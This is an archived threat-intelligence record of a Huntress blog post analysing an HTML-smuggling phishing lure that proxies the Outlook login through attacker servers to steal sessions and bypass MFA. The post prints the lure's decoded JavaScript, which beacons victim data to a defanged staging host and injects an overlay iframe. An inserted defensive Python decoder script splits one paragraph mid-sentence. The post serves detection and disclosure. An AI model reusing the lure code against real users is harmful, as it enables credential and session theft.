{
	"id": "a1f30344-9932-4ebf-bc6e-f57a4d31402f",
	"created_at": "2026-04-06T00:21:57.363365Z",
	"updated_at": "2026-04-10T03:31:13.72455Z",
	"deleted_at": null,
	"sha1_hash": "6c55378b99126269046d4b1e27657ac03a0286c2",
	"title": "Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the Middle Tradecraft",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2511371,
	"plain_text": "Smuggler’s Gambit: Uncovering HTML Smuggling Adversary in the\r\nMiddle Tradecraft\r\nBy Matt Kiely\r\nPublished: 2024-05-23 · Archived: 2026-04-05 23:23:16 UTC\r\ntl;dr\r\nHuntress uncovered the infrastructure of a mass phishing campaign including potentially novel tradecraft that combines\r\nHTML smuggling, injected iframes, and session theft via transparent proxy. This technique allows an attacker to steal\r\ncredentials and bypass MFA if a victim logs into a transparently proxied, locally rendered iframe of the Outlook login portal.\r\nThis technique is novel to us, at least, and we haven’t seen any examples of it before (if you have, I’d love to hear about it:\r\nmatt.kiely[@]huntresslabs.com). We submitted a takedown request to NameCheap for all identified domains. There are\r\nprobably still more out there. ATT\u0026CK matrix items and IoCs are at the bottom of this blog. Protect your neck.\r\nWatch Matt Kiely discuss this tradecraft.\r\nBackground\r\nOn May 21, 2024, Huntress identified three domains of interest from our Identity Threat Detection and Response telemetry.\r\nThe three domains are listed below. Does anything stick out immediately?\r\nhxxps://rnsnno.szyby[.]pro/ \r\nhxxps://rnsnno.kycmaxcapital[.]pro/\r\nhxxps://rnsnno.2398-ns[.]pro/\r\nAll three of these URLs use the same subdomain and the same top-level domain, but different domain names. 
Additional\r\nresearch unveiled that the three domains had been registered via NameCheap the day prior to their discovery on May 21:\r\nhttps://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft\r\nPage 1 of 15\r\n\r\nHaving spent time behind the console of transparent proxies as a red teamer, this set off all kinds of alarms for me.\r\nNameCheap remains one of the most prolific domain registrars for adversary activity, emulated or otherwise. But the\r\ndomain names and ages alone didn’t support the hypothesis that these were true evil yet, so we had to do some more recon.\r\nPoking at the web root of one of the servers revealed the landing page redirects to hxxps://example[.]com, which is a benign\r\nexample landing page used for web app demonstration.\r\nMore detective work by our fearless SOC leader Max Rogers and CTI analyst `TP5` uncovered several more interesting\r\nentities associated with one of the three identified suspicious domains (rnsnno.szyby[.]pro). By examining the VirusTotal\r\nrelations dashboard for this domain, we identified an HTML payload file (sha256:\r\n18470571777CA2628747C4F39C8DA39CA81D1686820B3927160560455A603E49) that contacted several domains upon\r\ndetonation, including rnsnno.szyby[.]pro. The full list of domains found in this payload file is available in the appendix.\r\nWait… an HTML payload file? What’s up with that?\r\nHTML Smuggling is a tried and true payload delivery mechanism favored by threat actors who wish to bypass modern\r\ndefenses. 
Instead of phishing the target with an executable, for example, a threat actor phishes the target with an HTML file.\nWhen the victim opens the HTML file on their endpoint, the HTML and JavaScript of the file serve an embedded payload to\nthe user via their web browser. This payload is often encoded or encrypted and dynamically reassembled within the browser,\nthen served to the user as a download. This is often a second stage payload, credential stealer, or some other type of\ninfectious malware. The advantages of HTML smuggling make it a favored tactic as it allows payloads to evade defensive\ntechnology that blocks by file extension.\nA telltale sign of an HTML smuggling payload is the presence of dynamically rendered encoded/encrypted text within the\noriginal HTML file. The JavaScript document.write() function is often used to decode and render HTML and additional\nJavaScript dynamically when the document is loaded into the client browser. This is exactly what we were greeted with\nwhen we opened the HTML file of interest:\nOf note here:\nThe base64 encoded text in the first document.write() call sets up the title of the document. 
It is nothing special,\r\nbesides using the Latin slashed O unicode character in the two O’s of the word “Outlook”:\r\nOutløøk\r\nThe block of base64 encoded text used in the second document.write() call, however, is paydirt from a malware\r\nanalysis perspective (URLs have been defanged):\r\n\r\n.replace('-----END PUBLIC KEY-----', '')\r\n.replace(/\\s+/g, '');\r\nconst byteArray = atob(base64String).split('').map(char =\u003e char.charCodeAt(0));\r\nreturn new Uint8Array(byteArray);\r\n}\r\nfunction arrayBufferToBase64(buffer) {\r\nlet binary = '';\r\nlet bytes = new Uint8Array(buffer);\r\nfor (var i = 0; i \u003c bytes.byteLength; i++) {\r\nbinary += String.fromCharCode(bytes[i]);\r\n}\r\nreturn window.btoa(binary);\r\n}\r\nlet sx = \"hxxps://rnsnno.vcsar[.]pro/?eymmdgau\";\r\nconst PUBLIC_KEY_PERM = `-----BEGIN PUBLIC KEY-----\r\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAynOl4t1+Seg3nPAGzBC2\r\nBEZWeNGzNKMPWab/6Fy/1AdQJNNe9JKgsi1Hji+5vRxf5DRLn4XP5ldvZN2MfwaY\r\nkww/N/njzuE//K8fOsm8/xjvHskc0zsjjnpwBQh9PlyRWhI0K3dIscZXoCiZXtrn\r\naLYRGSFC1MFm/OUF6lhckG67EUMqsPc7I5bJQaMG8tardzficKIFiE11kpe2R92q\r\nvcOHTY2jqkjx6Ga23gLy+3AWvJPgQpdbE/+ZB6ecuhxnP48CR4dHsupuXYkQaX+q\r\nEbjt96Jpo0cyYyKZG01NFStoc88avqsY5EdqCNcFDKEQ8XYmzCKAWUU4NGePnmYw\r\nvQIDAQAB\r\n-----END PUBLIC KEY-----\r\n`\r\nconst publicKey = pemToUint8Array(PUBLIC_KEY_PERM)\r\nlet el1 = document.getElementById(\"degag\");\r\nlet tl1 = el1.innerText;\r\nif (!tl1 || tl1 === eval(`'E'+'MAIL'+'_'+'CODE'`)) {\r\nsx = sx\r\n} else {\r\nsx = sx + '\u0026qrc=' + tl1\r\n}\r\nlet lTime = 0\r\nconst eD = document.getElementById(\"errorId\");\r\nlet xhr = new XMLHttpRequest();\r\nwindow.crypto.subtle.importKey(\r\n\"spki\",\r\npublicKey,\r\n{\r\nname: \"RSA-OAEP\",\r\nhash: \"SHA-256\"\r\n},\r\nfalse,\r\n[\"encrypt\"]\r\n).then(publicKeyMaterial =\u003e {\r\nconst userData = JSON.stringify({ ip: '', userAgent: navigator.userAgent})\r\nconst encodedUserAgent = new TextEncoder().encode(userData);\r\nreturn window.crypto.subtle.encrypt(\r\n{\r\nname: \"RSA-OAEP\"\r\n},\r\npublicKeyMaterial,\r\nencodedUserAgent\r\n);\r\n}).then(encryptedUserAgent =\u003e {\r\nconst encryptedUserAgentBase64 = arrayBufferToBase64(encryptedUserAgent);\r\nxhr.open('GET', sx, true);\r\nxhr.setRequestHeader(\"accept\", \"application/json\");\r\nxhr.setRequestHeader(\"qrc-auth\", encryptedUserAgentBase64);\r\nxhr.send();\r\n})\r\nxhr.onreadystatechange = function() {\r\nif (xhr.readyState === XMLHttpRequest.DONE) {\r\nif (xhr.status === 200) {\r\nconst cc = JSON.parse(xhr.responseText)\r\nconst jq = document.createElement('iframe');\r\nif (cc.url) {\r\njq.width = '100%';\r\njq.height = '500px';\r\njq.setAttribute('sandbox', 'allow-scripts allow-presentation allow-same-origin allow-popups-to-escape-sandbox allow-forms allow-top-navigation-by-user-activation');\r\njq.setAttribute('allowfullscreen', 1);\r\njq.setAttribute('style', 'none')\r\njq.onload = function() {\r\nif (lTime === 0) {\r\nconsole.log('1 fired')\r\nlTime +=1\r\n} else {\r\nconsole.log('2 fired')\r\njq.setAttribute('style', 'position:fixed; top:0; left:0; bottom:0; right:0; width:100%; height:100%; border:none; margin:0; padding:0; overflow:hidden; z-index:999999;');\r\n// document.body.replaceChild(document.body.firstChild, jq);\r\n}\r\n};\r\ndocument.body.appendChild(jq);\r\njq.src = cc.url\r\n} else {\r\neD.innerText = cc.error? cc.error : 'ACCESS DENIED';\r\neD.style.display = \"block\";\r\n}\r\n} else {\r\neD.innerText = 'CONNECTION FAILED';\r\neD.style.display = \"block\";\r\n}\r\n}\r\n};\r\n\u003c/script\u003e\r\n\u003chtml\u003e\r\nAmong other activities, this block of JavaScript does the following: it reads the keyed target identifier from the hidden “degag” element and appends it to the staging URL as the qrc parameter, encrypts the victim’s user agent with the embedded RSA-OAEP public key and sends it in a custom qrc-auth request header, and, if the staging server answers 200 with a JSON body containing a url field, creates an iframe pointed at that URL, appends it to the page, and on the iframe’s second load switches it to a fixed, full-viewport overlay. When\r\nthis HTML file is opened, the user sees the Outlook loading page followed by the Outlook authentication portal:\r\nTo recap: this HTML file is phished to the target and, once downloaded, resides locally on the victim’s machine. When it’s\r\nopened, it opens the default browser and renders the HTML present in the local file. This HTML contains a number of\r\ndocument.write() calls that decode and inject additional HTML and JavaScript into the document object model. When this\r\nroutine completes, the user sees the Outlook login portal that prompts them for their password. Interestingly, the username\r\nprompt has already been pre-filled with a targeted user’s email address, so all they have to do is input their password.\r\nBut the question remains: how is this weaponizable? Closer inspection revealed that the Outlook authentication portal is\r\ninjected as an iframe directly into the browser:\r\nInspecting the network traffic when the document is rendered reveals several network callouts. Many of these network\r\ncallouts are made to shady domains, but include trailing URI components of legitimate Microsoft infrastructure. 
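The layered document.write()/atob() pattern shown above can be triaged without detonating the file. The Python script below is an added example, not code from the Huntress post or from the payload: it peels document.write(atob('...')) stages recursively, then pulls out the indicators that matter for this tradecraft (contacted URLs, custom XHR header names, iframe injection and its sandbox tokens, use of WebCrypto, and non-ASCII lookalike characters in the page title). The HTML it runs on is constructed here to mirror the structure described in the post; the host stage.example.invalid, the ?lure path and the BASE64-RSA-OAEP-BLOB header value are placeholders, and only the qrc-auth header name and the sandbox tokens are taken from the real payload. The regexes only recognise the literal atob('...') form the post shows; a payload with its own decoder routine would need an extra handler.

```python
import base64
import html
import re

Q = chr(39)  # a single quote, kept out of the pattern literals so they stay readable

# Stage unwrapping idiom from the post: document.write(atob('<base64>'))
WRITE_ATOB = re.compile('document[.]write[(] *atob[(] *' + Q + '([A-Za-z0-9+/=]+)' + Q + ' *[)] *[)]')
URL_RE = re.compile('https?://[A-Za-z0-9.-]+(?::[0-9]+)?(?:[/?#][^' + Q + ' <>)]*)?')
HEADER_RE = re.compile('setRequestHeader[(] *' + Q + '([^' + Q + ']+)' + Q)
SANDBOX_RE = re.compile('setAttribute[(] *' + Q + 'sandbox' + Q + ' *, *' + Q + '([^' + Q + ']*)' + Q)
IFRAME_RE = re.compile('createElement[(] *' + Q + 'iframe' + Q)
TITLE_RE = re.compile('<title>(.*?)</title>', re.S)


def peel_layers(src, max_depth=8):
    # Breadth-first: every base64 blob handed to document.write(atob(...)) becomes a new
    # layer, and decoded layers are searched again, so nested stages are recovered too.
    layers = [src]
    frontier = [src]
    for _ in range(max_depth):
        nxt = []
        for layer in frontier:
            for blob in WRITE_ATOB.findall(layer):
                try:
                    nxt.append(base64.b64decode(blob, validate=True).decode('utf-8', 'replace'))
                except ValueError:
                    continue  # not valid base64; leave that call for manual review
        if not nxt:
            break
        layers.extend(nxt)
        frontier = nxt
    return layers


def defang(url):
    # hxxps://host[.]tld, the convention used throughout the post
    scheme, rest = url.split('://', 1)
    host, sep, tail = rest.partition('/')
    head, dot, tld = host.rpartition('.')
    if dot:
        host = head + '[.]' + tld
    return scheme.replace('http', 'hxxp') + '://' + host + sep + tail


def extract_indicators(html_src):
    layers = peel_layers(html_src)
    urls, headers, sandbox = set(), set(), set()
    title = ''
    for layer in layers:
        urls.update(URL_RE.findall(layer))
        headers.update(HEADER_RE.findall(layer))
        for attr in SANDBOX_RE.findall(layer):
            sandbox.update(attr.split())
        m = TITLE_RE.search(layer)
        if m and not title:
            title = html.unescape(m.group(1)).strip()
    return {
        'layers': len(layers),
        'urls': sorted(urls),
        'defanged': sorted(defang(u) for u in urls),
        'xhr_headers': sorted(headers),
        'iframe_injected': any(IFRAME_RE.search(layer) for layer in layers),
        'sandbox_tokens': sorted(sandbox),
        'uses_webcrypto': any('crypto.subtle' in layer for layer in layers),
        'title': title,
        # slashed-O style lookalikes in the title are a cheap tell for a lure
        'title_homoglyphs': sorted({c for c in title if ord(c) > 127}),
    }


# ---- Constructed sample (not the real payload) --------------------------------------
# Stage 1 sets the lookalike title (Outløøk, built with chr(248) so the file stays ASCII);
# stage 2 is a cut-down version of the fetch-and-iframe logic, aimed at a placeholder host.
TITLE_STAGE = '<title>Outl' + chr(248) * 2 + 'k</title>'
INNER_STAGE = '''<script>
let sx = 'https://stage.example.invalid/?lure';
window.crypto.subtle.importKey('spki', new Uint8Array(0), {name: 'RSA-OAEP', hash: 'SHA-256'}, false, ['encrypt']);
let xhr = new XMLHttpRequest();
xhr.open('GET', sx, true);
xhr.setRequestHeader('accept', 'application/json');
xhr.setRequestHeader('qrc-auth', 'BASE64-RSA-OAEP-BLOB');
xhr.send();
xhr.onreadystatechange = function() {
  if (xhr.readyState === 4 && xhr.status === 200) {
    const cc = JSON.parse(xhr.responseText);
    const jq = document.createElement('iframe');
    jq.setAttribute('sandbox', 'allow-scripts allow-same-origin allow-forms allow-top-navigation-by-user-activation');
    document.body.appendChild(jq);
    jq.src = cc.url;
  }
};
</script>'''


def b64(text):
    return base64.b64encode(text.encode('utf-8')).decode('ascii')


SAMPLE_HTML = (
    '<html><head><script>'
    + 'document.write(atob(' + repr(b64(TITLE_STAGE)) + '));'
    + 'document.write(atob(' + repr(b64(INNER_STAGE)) + '));'
    + '</script></head><body><div id=errorId></div></body></html>'
)

if __name__ == '__main__':
    for key, value in extract_indicators(SAMPLE_HTML).items():
        print(key + ':', value)
```

Run it as a script to print the summary, or import extract_indicators() and hand it the contents of a suspect .html attachment; the defanged URLs come out in the hxxps://host[.]tld form the post uses, so they can go straight into a ticket or a takedown request. What static peeling cannot show is what the staging server answers, which is why the live network trace still matters.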
For\r\nexample, one network request is hxxps://rnsnno.pristineitems[.]pro/owa/?login_hint=[targeted user’s email], which includes\r\na shady domain (rnsnno.pristineitems[.]pro) but also includes a call to the OWA endpoint with a login_hint parameter.\r\nAn additional request included the URL hxxps://rnsnno.vcsar[.]pro/?eymmdgau\u0026qrc=[base64 encoded email of the target].\r\nWe were able to successfully coerce the suspicious infrastructure to produce a new login page specific to one of our testbed\r\nusers by injecting the username into the ?qrc= URL parameter:\r\nNow we’re cooking on a convection stove 🔥 This test outcome basically told us everything that we needed. So what is\r\nactually going on here?\r\nHTML Smuggling + Adversary in the Middle = 😈\r\nThere is more to the HTML smuggling payload, but our initial analysis was more than enough to draw a firm hypothesis:\r\nThe HTML payload injects an iframe of the legitimate Microsoft authentication portal, which is what the user sees\r\nwhen they open the HTML file.\r\nHowever, it is injecting the iframe of the login portal page by retrieving it from enemy-controlled infrastructure.\r\nBecause the login portal is decorated with the actual CSS and company branding of a targeted company, our\r\nhypothesis is that this is not a simple site clone. Instead, we hypothesize that this infrastructure is presenting an\r\niframe that transparently proxies login requests. 
Injecting an arbitrary user into the shady domain’s URL parameters\r\nand seeing the resulting login page was enough to prove that this is a proxy, not a site clone.\r\nIn other words, the login page the victim sees is the legitimate Outlook login page, but it is proxied through enemy-controlled infrastructure, which allows for session token theft and MFA bypass if a victim were to input their username,\r\npassword, and MFA code.\r\nOur hypothesis for the actual attack is the following: \r\nThe attacker phishes the victim with an HTML file payload.\r\nThe victim opens it on their own host.\r\nThe HTML smuggling payload renders JavaScript into the client browser, which fetches and embeds an iframe of the\r\nlegitimate Outlook login portal.\r\nThis iframe is proxying the login traffic through attacker controlled infrastructure.\r\nThe victim logs in with their username, password, and MFA if applicable, which produces a session token that is then\r\nstolen by the adversary in the middle.\r\nThis allows the attacker to log in as that user by injecting the stolen token into their own browser, bypassing the\r\nrequirement for MFA and authenticating as the victim.\r\nTl;dr: This has the hallmarks of an MFA-bypass Adversary in the Middle transparent proxy phishing attack, but\r\nuses an HTML smuggling payload with an injected iframe instead of a simple link. And that is scary.\r\nI’ll be real with you; I’ve run (authorized, legal) red team campaigns that used HTML smuggling to install a beacon on a\r\ntarget endpoint. I’ve also run campaigns that used transparent proxies to steal a target’s session. Both of those tactics are\r\nremarkably effective. But I never once thought about combining them. 
Frankly, this is a brilliant TTP and I’d like to make\r\nsure as many people know about it as possible so we can burn it to the ground.\r\nAdversary Tooling\r\nAt this time, the Huntress research team is not 100% confident about the actual tool used for this campaign. We can\r\nconfidently rule out Evilginx, however, due to the differences in the lure pattern, URL parameter pattern, and existence of\r\nkeyed payload HTML files. It is possible that this is one of the newer Phishing as a Service frameworks, but more research\r\nis needed to draw a conclusion one way or the other. In the interest of time, the Huntress research team is eschewing this\r\ndetermination in favor of getting the word out about the actual payload mechanism and how it works.\r\nIf this is not actually a new phishing technique, it is at least new to Huntress, which means it will likely be new to our\r\npartners. If any researchers have more information on the specifics of the tradecraft on display, please email me directly and\r\nI’d love to hear it (matt.kiely[@]huntresslabs.com).\r\nWhat is Huntress Doing?\r\nSo far, we have submitted takedown requests to NameCheap with all identified infrastructure. NameCheap is often quite\r\ncooperative with their takedown requests, so we anticipate that the identified enemy infrastructure will be burnt in short\r\norder. But there will be more on the way, so we are using our telemetry to submit more requests as we find them. \r\nWhat Can I Do?\r\nHTML files are extremely dangerous. If you didn’t expect to receive an HTML file from someone via email, take caution\r\nwhen handling it and contact your IT/security department. Do not ever enter your credentials into a login portal without\r\nverifying that it is the correct URL and domain that you expect (e.g. 
login.microsoftonline.com or the equivalent). Note that in this campaign the lure is a local HTML file, so the browser’s address bar shows a file path rather than any Microsoft domain; a Microsoft login prompt appearing inside a file opened from disk or from an email attachment is itself the tell.\r\nIf you suspect you or anyone you know has been hit by a smooth smuggler, even if you’re not a Huntress protected\r\ncustomer, email me directly (matt.kiely[@]huntresslabs.com). We fear this is a lot more widespread than what we’ve\r\nobserved already and any information will help us combat this new identity tradecraft.\r\nWe weren’t even looking for this specifically and ended up finding a potentially novel type of identity attack. Interested in\r\nlearning about all of the shady stuff we catch when we are looking out for you? Feel free to start a trial with us!\r\nAppendix\r\nATT\u0026CK\r\nTechnique | Sub-technique | Description\r\nObfuscated Files or Information (T1027) | HTML Smuggling (T1027.006) | Adversaries are using HTML smuggling to present a proxied login portal to victims.\r\nSteal Web Session Cookie (T1539) | N/A | Adversaries are injecting iframe rendered login portals that route authentications through transparent proxies to steal sessions.\r\nAdversary-in-the-Middle (T1557) | N/A | Adversaries are using injected iframes to render login portals that route authentications through transparent proxies to steal sessions.\r\nIndicators of Compromise\r\nIoC Type | Indicator | Hash\r\nHTML Smuggling Payload | [REDACTED ORG NAME] remittance 05212024.html | 18470571777CA2628747C4F39C8DA39CA81D1686820B3927160560455A603E49\r\nAitM/Phishing Infrastructure | hxxps://rnsnno.2398-ns[.]pro/ | N/A\r\nAitM/Phishing Infrastructure | hxxps://rnsnno.kycmaxcapital[.]pro/ | N/A\r\nAitM/Phishing Infrastructure | hxxps://rnsnno.szyby[.]pro/ | N/A\r\nAdditional Domains\r\nNote: these domains are not all confirmed to be malicious and many of them are legitimate services. 
These listed\r\ndomains were found in the HTML smuggling payload and are presented for context and string matching.\r\nAMS-efz.ms-acdc.office[.]com\r\naadcdn.msauth[.]net\r\naadcdn.msftauth[.]net\r\naadcdn.msftauthimages[.]net\r\nautologon.microsoftazuread-sso[.]com\r\nbovdrrqkblhbfk[.]local\r\nclientservices.googleapis[.]com\r\ncontent-autofill.googleapis[.]com\r\ncs1100.wpc.omegacdn[.]net\r\nedgedl.me.gvt1[.]com\r\nidentity.nel.measure.office[.]net\r\nihscshtfplb[.]local\r\nlogin.live[.]com\r\nooc-g2.tm-4.office[.]com\r\noutlook.ms-acdc.office[.]com\r\noutlook.office365[.]com\r\npart-0039.t-0009.t-msedge[.]net\r\npasswordreset.microsoftonline[.]com\r\nr3.i.lencr[.]org\r\nr4.res.office365[.]com\r\nrnsnno.szyby[.]pro\r\nrnsnno.vcsar[.]pro\r\nscxgcytrl[.]local\r\nshed.dual-low.part-0039.t-0009.t-msedge[.]net\r\ntse1.mm.bing[.]net\r\nx1.i.lencr[.]org\r\nSpecial thanks to Max Rogers and `TP5` for their outstanding detective work and contributions.\r\nSource: https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://www.huntress.com/blog/smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft"
	],
	"report_names": [
		"smugglers-gambit-uncovering-html-smuggling-adversary-in-the-middle-tradecraft"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434917,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.pdf",
		"text": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.txt",
		"img": "https://archive.orkl.eu/6c55378b99126269046d4b1e27657ac03a0286c2.jpg"
	}
}